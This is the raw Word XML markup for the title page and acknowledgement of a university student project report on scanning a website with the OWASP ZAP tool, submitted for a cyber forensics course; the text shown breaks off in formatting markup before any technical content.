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D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:right="44"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Project Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="230"/>
        <w:ind w:left="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="344"/>
        <w:ind w:right="51"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D065D" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="197"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Scan using OWASP (ZAP Tool)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="197"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D065D" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="003D065D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Cyber Forensics and Cyber L</w:t>
      </w:r>
      <w:r w:rsidR="003D065D" w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="125"/>
        <w:ind w:left="59" w:right="94" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="197"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Bachelor of Technology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="187"/>
        <w:ind w:right="41"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:right="58"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Computer Science &amp; Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="137"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="38"/>
        <w:ind w:left="137"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="169"/>
        <w:jc w:val="cente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32B1EF31" wp14:editId="6F3203E3">
            <wp:extent cx="3190875" cy="253054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1-12-25 at 7.11.34 PM.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3195190" cy="2533971"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="175"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="227" w:lineRule="auto"/>
        <w:ind w:left="4458" w:right="4283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:spacing w:after="31"/>
        <w:ind w:left="137"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8880"/>
        </w:tabs>
        <w:spacing w:after="33"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitted To  </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Submitted by </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00840B61">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Ms. Bharti Sahu</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00840B61" w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Rajeev Kumar </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840B61" w:rsidRPr="004750F9" w:rsidRDefault="00840B61" w:rsidP="00840B61">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                           Nikhil Narang</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">                                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840B61" w:rsidRPr="004750F9" w:rsidRDefault="00840B61" w:rsidP="00840B61">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                           Rohit Garg</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840B61" w:rsidRPr="004750F9" w:rsidRDefault="00840B61" w:rsidP="00840B61">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8880"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                           Deepak Kumar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00840B61" w:rsidP="00CB6D22">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8880"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                                                </w:t>
      </w:r>
      <w:r w:rsidR="00CB6D22" w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CB6D22" w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D065D" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00840B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="2542"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840B61" w:rsidRPr="004750F9" w:rsidRDefault="00840B61" w:rsidP="00840B61">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="246"/>
        <w:ind w:right="63"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Deenbandhu Chhotu Ram University of Science  and Technology  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00785C5C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ACKNOWLEDGEMENT</w:t>
      </w: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pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A successful task makes everyone happy. Success will often be crowned to people who made it reality but the people who are behind curtain with constant guidance and encouragement that made it possible will be crowned first on the eve of success. Words are inadequate to express my deep sense of gratitude towards all those people behind the screen who guided, inspired and helped me for the completion of our project work. The successful completion of the project on “</w:t>
      </w:r>
      <w:r w:rsidR="00E62C19" w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WEBSITE ANALYSIS (ZAP TOOL)</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” which I have undertaken has a partial fulfillment of the requirements for the award of Bachelor of technology degree in Computer Science and Engineering. It is with profound sense of gratitude that I acknowledge my project guide  Ms. Bharti Sahu for providing me with live specification and his valuable suggestion which encouraged me to complete this project successfully. I thank our Ms. Bharti Sahu  for permitting us to do this project. At last but not the least I thank entire Computer Science department who rendered their full cooperation for successful completion of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00785C5C">
      <w:pPr>
        <w:spacing w:after="122" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="60"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00E50840">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E50840" w:rsidRPr="004750F9" w:rsidRDefault="00E50840" w:rsidP="00E50840">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E50840" w:rsidRPr="004750F9" w:rsidRDefault="00E50840" w:rsidP="00E50840">
      <w:pPr>
        <w:spacing w:after="12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rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w: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both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
